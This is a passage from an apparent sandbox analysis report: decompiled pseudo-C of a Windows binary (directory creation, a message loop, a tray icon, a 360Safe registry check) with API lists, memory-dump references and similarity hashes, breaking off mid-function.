									E00C9820F(_t69 - 0x10);
									_t31 =  *(_t69 + 8);
									goto L17;
								} else {
									__imp__SHCreateDirectoryExW(_t37,  *(_t69 - 0x10), _t37); // executed
									__eflags = _t37;
									if(_t37 == 0) {
										L15:
										E00CAF69F( *((intOrPtr*)(_t69 - 0x14)), _t69 - 0x10);
										goto L16;
									} else {
										__eflags = _t37 - 0x50;
										if(_t37 == 0x50) {
											goto L15;
										} else {
											__eflags = _t37 - 0xb7;
											if(_t37 != 0xb7) {
												 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)))) = GetLastError();
												E00C9820F(_t69 - 0x10);
												_t68 = 0;
												__eflags = 0;
											} else {
												goto L15;
											}
										}
									}
								}
							}
							goto L20;
							L17:
							_t66 = _t66 + 1;
							__eflags = _t66 -  *(_t31 - 8);
						} while (_t66 <  *(_t31 - 8));
						goto L18;
					}
					L20:
					E00C9820F(_t69 + 8);
					_t33 = _t68;
				} else {
					_t55 =  *_t31 & 0x0000ffff;
					if(_t55 < 0x61 || _t55 > 0x7a) {
						if(_t55 + 0xffffffbf > 0x19) {
							goto L9;
						} else {
							goto L4;
						}
					} else {
						L4:
						if((_t31[1] & 0x0000ffff) == 0x3a) {
							_t58 = _t31[2] & 0x0000ffff;
							__eflags = (_t58 & 0x0000ffff) - 0x5c;
							if((_t58 & 0x0000ffff) == 0x5c) {
								goto L9;
							} else {
								__eflags = (_t58 & 0x0000ffff) - 0x2f2f;
								if((_t58 & 0x0000ffff) != 0x2f2f) {
									goto L5;
								} else {
									goto L9;
								}
							}
						} else {
							L5:
							E00C9820F(_t69 + 8);
							_t33 = 0;
						}
					}
				}
				return E00D01632(_t33);
			}












                                                                                                                                                                                          0x00ced21b
                                                                                                                                                                                          0x00ced21b
                                                                                                                                                                                          0x00ced222
                                                                                                                                                                                          0x00ced227
                                                                                                                                                                                          0x00ced22a
                                                                                                                                                                                          0x00ced233
                                                                                                                                                                                          0x00ced240
                                                                                                                                                                                          0x00ced245
                                                                                                                                                                                          0x00ced248
                                                                                                                                                                                          0x00ced24e
                                                                                                                                                                                          0x00ced29e
                                                                                                                                                                                          0x00ced29e
                                                                                                                                                                                          0x00ced2a0
                                                                                                                                                                                          0x00ced2a2
                                                                                                                                                                                          0x00ced308
                                                                                                                                                                                          0x00ced30a
                                                                                                                                                                                          0x00ced2a4
                                                                                                                                                                                          0x00ced2a4
                                                                                                                                                                                          0x00ced2a8
                                                                                                                                                                                          0x00ced2ac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced2ae
                                                                                                                                                                                          0x00ced2ae
                                                                                                                                                                                          0x00ced2b2
                                                                                                                                                                                          0x00ced2b6
                                                                                                                                                                                          0x00ced2be
                                                                                                                                                                                          0x00ced2c2
                                                                                                                                                                                          0x00ced2c8
                                                                                                                                                                                          0x00ced2ca
                                                                                                                                                                                          0x00ced2f3
                                                                                                                                                                                          0x00ced2f6
                                                                                                                                                                                          0x00ced2fa
                                                                                                                                                                                          0x00ced2ff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced2cc
                                                                                                                                                                                          0x00ced2d1
                                                                                                                                                                                          0x00ced2d7
                                                                                                                                                                                          0x00ced2d9
                                                                                                                                                                                          0x00ced2e7
                                                                                                                                                                                          0x00ced2ee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced2db
                                                                                                                                                                                          0x00ced2db
                                                                                                                                                                                          0x00ced2de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced2e0
                                                                                                                                                                                          0x00ced2e0
                                                                                                                                                                                          0x00ced2e5
                                                                                                                                                                                          0x00ced316
                                                                                                                                                                                          0x00ced31b
                                                                                                                                                                                          0x00ced320
                                                                                                                                                                                          0x00ced320
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced2e5
                                                                                                                                                                                          0x00ced2de
                                                                                                                                                                                          0x00ced2d9
                                                                                                                                                                                          0x00ced2ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced302
                                                                                                                                                                                          0x00ced302
                                                                                                                                                                                          0x00ced303
                                                                                                                                                                                          0x00ced303
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced2a4
                                                                                                                                                                                          0x00ced322
                                                                                                                                                                                          0x00ced325
                                                                                                                                                                                          0x00ced32a
                                                                                                                                                                                          0x00ced250
                                                                                                                                                                                          0x00ced250
                                                                                                                                                                                          0x00ced257
                                                                                                                                                                                          0x00ced266
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced268
                                                                                                                                                                                          0x00ced268
                                                                                                                                                                                          0x00ced270
                                                                                                                                                                                          0x00ced284
                                                                                                                                                                                          0x00ced28b
                                                                                                                                                                                          0x00ced28f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced291
                                                                                                                                                                                          0x00ced299
                                                                                                                                                                                          0x00ced29c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced29c
                                                                                                                                                                                          0x00ced272
                                                                                                                                                                                          0x00ced272
                                                                                                                                                                                          0x00ced275
                                                                                                                                                                                          0x00ced27a
                                                                                                                                                                                          0x00ced27a
                                                                                                                                                                                          0x00ced270
                                                                                                                                                                                          0x00ced257
                                                                                                                                                                                          0x00ced281

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CED222
                                                                                                                                                                                            • Part of subcall function 00CAE7F0: CharNextW.USER32(00000000,00000000,?,00CED238,0000005C,00000008,00CED38A,?,?,?,0000002C), ref: 00CAE817
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,00D48B4C,0000005C,00000008,00CED38A,?,?,?,0000002C), ref: 00CED2C2
                                                                                                                                                                                          • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 00CED2D1
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0000002C), ref: 00CED30D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharCreateDirectoryErrorExistsFileH_prolog3LastNextPath
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 435477562-0
                                                                                                                                                                                          • Opcode ID: e88c93e2393e6bee808c17367e38558de9153d0d02733ef77cf6b79ab047c7b5
                                                                                                                                                                                          • Instruction ID: 62265785f8588a09999f6dd1292364490bd91d08cc63d0032cde3ace1ceda611
                                                                                                                                                                                          • Opcode Fuzzy Hash: e88c93e2393e6bee808c17367e38558de9153d0d02733ef77cf6b79ab047c7b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: D731C471900169DFCF14EBA5C959BBEB770EF11300F808029E967AB1A1DB30DE44E761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C980A8 Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E00C980A8() {
				struct HWND__* _v4;
				intOrPtr _v8;
				int _t8;
				int _t9;
				void* _t17;
				intOrPtr* _t19;
				intOrPtr* _t23;
				MSG* _t24;
				void* _t26;

				_t23 = _t19;
				_t26 = 1;
				_t24 = _t23 + 0x1c;
				while(1) {
					_v4 = 0;
					do {
						while(_t26 != 0) {
							_t8 = PeekMessageW(_t24, 0, 0, 0, 0); // executed
							if(_t8 != 0) {
								break;
							}
							_t17 =  *((intOrPtr*)( *_t23 + 4))(_v4);
							_v8 = _v8 + 1;
							if(_t17 == 0) {
								_t26 = 0;
							}
						}
						_t9 = GetMessageW(_t24, 0, 0, 0); // executed
						if(_t9 == 0xffffffff) {
							continue;
						}
						if(_t9 == 0) {
							return  *((intOrPtr*)(_t23 + 0x24));
						}
						_push(_t24);
						if( *((intOrPtr*)( *_t23))() == 0) {
							TranslateMessage(_t24);
							DispatchMessageW(_t24); // executed
						}
					} while (E00C976C4(_t24) == 0);
					_t26 = 1;
				}
			}












                                                                                                                                                                                          0x00c980af
                                                                                                                                                                                          0x00c980b1
                                                                                                                                                                                          0x00c980b4
                                                                                                                                                                                          0x00c980b7
                                                                                                                                                                                          0x00c980b7
                                                                                                                                                                                          0x00c980e1
                                                                                                                                                                                          0x00c980e1
                                                                                                                                                                                          0x00c980c2
                                                                                                                                                                                          0x00c980ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c980d4
                                                                                                                                                                                          0x00c980d7
                                                                                                                                                                                          0x00c980dd
                                                                                                                                                                                          0x00c980df
                                                                                                                                                                                          0x00c980df
                                                                                                                                                                                          0x00c980dd
                                                                                                                                                                                          0x00c980e9
                                                                                                                                                                                          0x00c980f2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c980f6
                                                                                                                                                                                          0x00c98129
                                                                                                                                                                                          0x00c98129
                                                                                                                                                                                          0x00c980fa
                                                                                                                                                                                          0x00c98101
                                                                                                                                                                                          0x00c98104
                                                                                                                                                                                          0x00c9810b
                                                                                                                                                                                          0x00c9810b
                                                                                                                                                                                          0x00c98118
                                                                                                                                                                                          0x00c9811e
                                                                                                                                                                                          0x00c9811e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PeekMessageW.USER32 ref: 00C980C2
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00C980E9
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00C98104
                                                                                                                                                                                          • DispatchMessageW.USER32 ref: 00C9810B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1533324876-0
                                                                                                                                                                                          • Opcode ID: eba92b96876caadf302a6dc38ebcf6d562b2f4545512dba1cf0ff24be59c8a67
                                                                                                                                                                                          • Instruction ID: 3855079967c2020801c5b5f3594e9fda21d20141d5166729d95ea0f73b7ebf5e
                                                                                                                                                                                          • Opcode Fuzzy Hash: eba92b96876caadf302a6dc38ebcf6d562b2f4545512dba1cf0ff24be59c8a67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09016D712056096F5F209FA89C8CD7BB7ACEF4239A7105119F522C3551EF209D4A96B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CB6A05 Relevance: 6.0, APIs: 4, Instructions: 43windowtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CB6A05(void* __ecx, intOrPtr _a4) {
				struct HWND__* _t15;
				int _t16;
				int _t17;
				struct HICON__* _t19;
				struct _NOTIFYICONDATAW* _t22;
				void* _t23;

				_t23 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x6ce)) == 0) {
					_t19 = LoadIconW( *0xd675fc, 0xcd); // executed
					 *(_t23 + 0x6ce) = _t19;
				}
				 *(_t23 + 0x312) =  *(_t23 + 0x6ce);
				_t15 =  *(_t23 + 4);
				_t6 = _t23 + 0x2fe; // 0x284
				_t22 = _t6;
				_t22->cbSize = 0x3b8;
				 *((intOrPtr*)(_t23 + 0x306)) = 0xce;
				 *((intOrPtr*)(_t23 + 0x30a)) = 7;
				 *((intOrPtr*)(_t23 + 0x6a2)) = 0;
				 *(_t23 + 0x302) = _t15;
				 *((intOrPtr*)(_t23 + 0x30e)) = 0x464;
				 *((intOrPtr*)(_t23 + 0x61e)) = 0x2ee0;
				if(_a4 == 0) {
					_t16 = SetTimer(_t15, 0x2711, 0x7d0, 0); // executed
					return _t16;
				}
				_t17 = Shell_NotifyIconW(1, _t22);
				if(_t17 == 0) {
					return Shell_NotifyIconW(0, _t22);
				}
				return _t17;
			}









                                                                                                                                                                                          0x00cb6a07
                                                                                                                                                                                          0x00cb6a12
                                                                                                                                                                                          0x00cb6a1f
                                                                                                                                                                                          0x00cb6a25
                                                                                                                                                                                          0x00cb6a25
                                                                                                                                                                                          0x00cb6a31
                                                                                                                                                                                          0x00cb6a37
                                                                                                                                                                                          0x00cb6a3a
                                                                                                                                                                                          0x00cb6a3a
                                                                                                                                                                                          0x00cb6a40
                                                                                                                                                                                          0x00cb6a46
                                                                                                                                                                                          0x00cb6a50
                                                                                                                                                                                          0x00cb6a5a
                                                                                                                                                                                          0x00cb6a60
                                                                                                                                                                                          0x00cb6a66
                                                                                                                                                                                          0x00cb6a70
                                                                                                                                                                                          0x00cb6a7e
                                                                                                                                                                                          0x00cb6aa1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb6aa1
                                                                                                                                                                                          0x00cb6a89
                                                                                                                                                                                          0x00cb6a8d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb6a91
                                                                                                                                                                                          0x00cb6aaa

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadIconW.USER32(000000CD), ref: 00CB6A1F
                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00CB6A89
                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 00CB6A91
                                                                                                                                                                                          • SetTimer.USER32(?,00002711,000007D0,00000000), ref: 00CB6AA1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Icon$NotifyShell_$LoadTimer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2558709860-0
                                                                                                                                                                                          • Opcode ID: c61f49d51eb706ecf45521e6843c9f556abf0a6b98d302ead5dd3e6b2e0e6fe6
                                                                                                                                                                                          • Instruction ID: 034e912aec5af02d42c4963e61b1ffe40a236300e4095499e0b63afa0e320cb2
                                                                                                                                                                                          • Opcode Fuzzy Hash: c61f49d51eb706ecf45521e6843c9f556abf0a6b98d302ead5dd3e6b2e0e6fe6
                                                                                                                                                                                          • Instruction Fuzzy Hash: A10184B4601701DFEB20CF24DC49F93BBF8EB44304F00482EE19AA6281C7B56654CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D0A5B0 Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00D0A5B0(long _a4) {
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;

				_t12 =  *0xd44700;
				if( *0xd44700 != 0 && E00D10210(_t12, 0xd44700) != 0) {
					 *0xd44700();
				}
				if(E00D10C93(_t6, _t9) != 0) {
					E00D10E55(_t6, _t9, _t10, _t11, _t2);
				}
				ExitThread(_a4);
			}







                                                                                                                                                                                          0x00d0a5b5
                                                                                                                                                                                          0x00d0a5bc
                                                                                                                                                                                          0x00d0a5cd
                                                                                                                                                                                          0x00d0a5cd
                                                                                                                                                                                          0x00d0a5da
                                                                                                                                                                                          0x00d0a5dd
                                                                                                                                                                                          0x00d0a5e2
                                                                                                                                                                                          0x00d0a5e6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00D0A5C3
                                                                                                                                                                                            • Part of subcall function 00D10210: __FindPESection.LIBCMT ref: 00D1026B
                                                                                                                                                                                          • __getptd_noexit.LIBCMT ref: 00D0A5D3
                                                                                                                                                                                          • __freeptd.LIBCMT ref: 00D0A5DD
                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00D0A5E6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3182216644-0
                                                                                                                                                                                          • Opcode ID: de9fe4528cded9fb72587e5866bb7f5824ba20f354932e527e03dabc8b5f4290
                                                                                                                                                                                          • Instruction ID: 6191893ca5fb405b968198a99739ebaf2aec683c25e5a04d5ec94a8a250ec84c
                                                                                                                                                                                          • Opcode Fuzzy Hash: de9fe4528cded9fb72587e5866bb7f5824ba20f354932e527e03dabc8b5f4290
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFD017251017856BDB243B69FC0E75A3A59EB42375F080520F908C91E1DFB0C9C2C5B6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC62D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CC62D3() {
				void _v8;
				int _v12;
				int _v16;
				int _t11;
				int _t15;

				_v8 = _v8 & 0x00000000;
				_t11 = 4;
				_v16 = _t11;
				_v12 = _t11;
				_t15 = SHGetValueW(0x80000001, L"Software\\360Safe", L"EnableUE",  &_v16,  &_v8,  &_v12); // executed
				if(_t15 == 0) {
					return 0 | _v8 != 0x00000000;
				} else {
					return 1;
				}
			}








                                                                                                                                                                                          0x00cc62d9
                                                                                                                                                                                          0x00cc62df
                                                                                                                                                                                          0x00cc62e0
                                                                                                                                                                                          0x00cc62e3
                                                                                                                                                                                          0x00cc6301
                                                                                                                                                                                          0x00cc6309
                                                                                                                                                                                          0x00cc6319
                                                                                                                                                                                          0x00cc630b
                                                                                                                                                                                          0x00cc630f
                                                                                                                                                                                          0x00cc630f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 00CC6301
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                          • String ID: EnableUE$Software\360Safe
                                                                                                                                                                                          • API String ID: 3702945584-3756293347
                                                                                                                                                                                          • Opcode ID: fb5d6a9dca950a3e6bb92e63b121f5d1b7fc7286be45482dde0a28d2acc3b6f1
                                                                                                                                                                                          • Instruction ID: 7e2237ede02d9dbd477b8de758a7e321ab6d8896e68d2f886e93167a416328c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb5d6a9dca950a3e6bb92e63b121f5d1b7fc7286be45482dde0a28d2acc3b6f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0EDB2E4020CFFDB00DBA49946FDE77FCAB04755F1445B6A516E2080EAB49B489BA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C82860 Relevance: 4.8, APIs: 3, Instructions: 286COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00C82860(char* __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				signed int _v8;
				char _v24;
				char _v40;
				char _v704;
				char _v708;
				char _v1732;
				void* _v1736;
				char _v1740;
				void* _v1744;
				void* _v1748;
				void* _v1752;
				void* _v1756;
				void* _v1760;
				void* _v1764;
				void* _v1768;
				void* _v1772;
				char _v1776;
				char _v1780;
				void _v1784;
				void* _v1788;
				void* _v1792;
				void* _v1796;
				void* _v1800;
				void* _v1804;
				void* _v1808;
				void* _v1812;
				void* _v1816;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t100;
				void* _t106;
				void* _t107;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t121;
				void _t122;
				void* _t131;
				void* _t132;
				void* _t133;
				void _t136;
				void* _t137;
				void* _t138;
				void* _t140;
				void* _t142;
				intOrPtr _t145;
				intOrPtr _t146;
				void* _t153;
				void* _t165;
				void* _t167;
				intOrPtr _t173;
				intOrPtr _t176;
				void* _t178;
				intOrPtr _t179;
				intOrPtr _t180;
				void* _t183;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				void* _t188;
				void* _t189;

				_t168 = __edx;
				_t186 = (_t184 & 0xfffffff8) - 0x714;
				_t100 =  *0xd64070; // 0x8a9e1774
				_v8 = _t100 ^ _t186;
				_t172 = 0;
				_t144 = __ecx;
				_t178 = __edx;
				_v1788 = _a4;
				_v1804 = __edx;
				_v1816 = 0;
				_v1796 = 0;
				_v1784 = 3;
				_v708 = 0;
				E00D006A0(0,  &_v704, 0, 0x294);
				_t187 = _t186 + 0xc;
				_v1808 = 0;
				_v1772 = 0;
				_v1768 = 0;
				_v1764 = 0;
				_v1760 = 0;
				_v1756 = 0;
				_v1752 = 0;
				_v1748 = 0;
				_v1744 = 0;
				_v1740 = 0;
				_v1736 = 0;
				if(_t178 == 0) {
					_v1800 = 0x2000;
					_t172 = E00D017AD(_t144, _t168, 0, 0x2000);
					_t187 = 4 + _t187;
					__eflags = _t172;
					if(_t172 == 0) {
						SetLastError(8);
					}
					_v1796 = _t172;
					__eflags = _t172;
					if(__eflags != 0) {
						goto L4;
					} else {
						_push(0xd47270);
						_push(_t172);
						_push(_t172);
						_t168 = 0xd47270;
						E00C88150(0xd47270);
						_t187 = _t187 + 0xc;
						goto L36;
					}
				} else {
					_t142 =  *((intOrPtr*)(_t178 + 0x2c));
					 *_t178 = 1;
					 *(_t178 + 0x28) = 0;
					if(_t142 == 0) {
						L11:
						 *_t178 = 3;
						goto L35;
					} else {
						_t167 =  *((intOrPtr*)(_t178 + 0x30));
						_t194 = _t167;
						if(_t167 == 0) {
							goto L11;
						} else {
							_v1796 = _t142;
							_v1800 = _t167;
							L4:
							_t106 = E00C85690(_t194, _t144);
							_t187 = 4 + _t187;
							_v1816 = _t106;
							_t195 = _t106;
							if(_t106 == 0) {
								L35:
								__eflags = _t178;
								if(_t178 == 0) {
									goto L36;
								}
								goto L38;
							} else {
								_t168 =  &_v1808;
								_t144 =  &_v708;
								_t172 = _t106;
								_v1812 = 0;
								_t113 = E00C810A0( &_v708, _t172, _t195,  &_v1808);
								_t187 = 4 + _t187;
								if(_t113 == 0) {
									goto L35;
								} else {
									if(_v1808 == 0) {
										_t172 =  &_v1808;
